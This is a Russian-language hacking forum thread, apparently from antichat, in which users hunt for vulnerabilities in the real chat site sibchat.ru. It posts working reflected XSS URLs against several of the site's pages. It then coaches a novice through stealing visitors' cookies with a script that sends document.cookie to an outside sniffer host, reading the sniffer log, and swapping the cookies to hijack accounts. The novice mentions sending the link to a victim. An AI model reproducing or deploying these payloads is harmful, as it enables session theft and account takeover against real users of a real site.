Чаты найти уязвимости чата http://sibchat.ru

Посмотрите чат http://sibchat.ru может что-нибудь можно с ним сделать...
Спасибо второй раз.

 

пассивная XSS:
http://www.sibchat.ru/gallery.php?sid='><script>alert(/Kaban/)</script>

 

Kaban, молодец. Ксс рабочая, проверял.
http://www.sibchat.ru/gallery.php?sid='><script>alert(document.cookie)</script>
Впринципе считаю вопрос исчерпаным. Тему пока что закрывать не буду, может сам ещё найду что нибудь, или другие выложут. Но за оффтоп буду ставить минусы.

 

А что можно через Xss сделать, и дайте пожалуйста ссылку, где можно подробно об Xss узнать....
Спасибо, что ответили...

 

Вот это почитай

http://forum.antichat.ru/thread24312-xss.html
http://forum.antichat.ru/thread20140.html

 

И еще
http://forum.antichat.ru/thread7083-%CD%E5%E1%EE%EB%FC%F8%EE%E9+faq+(XSS).html

http://forum.antichat.ru/thread14424-%CA%E0%EA+%E7%E0%F8%E8%F4%F0%EE%E2%E0%F2%FC+%F1%F1%FB%EB%EA%F3.html

http://forum.antichat.ru/thread19997-%DD%ED%F6%E8%EA%EB%EE%EF%E5%E4%E8%FF+%F3%FF%E7%E2%E8%EC%FB%F5+%F1%EA%F0%E8%EF%F2%EE%E2.html

И еще по юзай гугл:

Вот так задай гуглу. И лн тебе найдет!

 

одни только xss
http://www.sibchat.ru/card_help.php?sid=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://www.sibchat.ru/register.php?sid=%3C/script%3E%3Cscript%3Ealert()%3C/script%3E

 

Можно отсюда http://forum.chita.ru/
Если версия форума реально 2.06 то топаем сюда http://www.securitylab.ru/vulnerability/203209.php

 

И ещё..
Показывает comp_id, то есть можно предположить что для бана они используют comp_id.
http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie)</script>
-------------
Здесь то же самое:
http://www.sibchat.ru/register.php?sid="><script>alert(document.cookie)</script>
Только ещё вылазиет такая бяка:

-------------
ЗЫ Все три ксс добавлю в f.a.q. по чатам

 

Ответьте пожалуйста на такой вопрос. Куки когда считываются, куда они считываются, где их прочесть, то можно?

 

в логе сниффера... /log.php (или как там у тебя...)
в QUERY: session_id= pass_hash=

 

Тоисть это надо писать к примеру http://antichat.ru/cgi-bin/s.jpg?? если да, то между какими строчками этот лог вписывать?

 

http://antichat.ru/cgi-bin/s.jpg - это сниффер, который ты вставляешь в скрипт...
http://antichat.ru/sniff/log.php - это лог... в котором ты смотришь результаты...

 

Вот всё что было в ПМ, спрашивай по тексту, что тебе не понятно.
=================================================

http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie)</script>
Если я правльно тебя понял, то ты про это. Вот одна из тех ксс. В теле тега <script> ты должен прописать путь на сниффер. Если использовать сниффер от античата, то запрос будет таким:
http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
Лог находится здесь: http://antichat.ru/sniff/log.php
В поле QUERY должны высветится разнообразные символы. Это и есть куки. Потом с помощью Оперы или Кукиэдитора делаешь подмену куков, и всё. Можешь так же воспользоватся скриптом от Дрона: http://forum.antichat.ru/threadnav22898-1-10.html
Всё. Дальше уже только нужен твой мозг.

 

Это получатся мне надо вписать сниффер вместо document.cookie? а жертва должна по ссылке пройти*?

 

Всё Slip вроде понял, буду юзать, я вот подумал может кто тел. даст я позвоню, проще будет...

 

Вот насчёт телефона эт вряд ли) Ладно, разбирайся. Будут вопросы, спрашивай.

 

Ну ладно с тел-ом забыли, вот ещё два вопроса, где взять куиэдитор не могу найти в нете, или как их подменить с помощью оперы?

 

Хм..... я отправил ссылку со сниффером, он сходил по ней а в логе ни чего нету? что это может быть?

 

Дык куки надо же послать. А не просто давать ссылку на gif файл :-D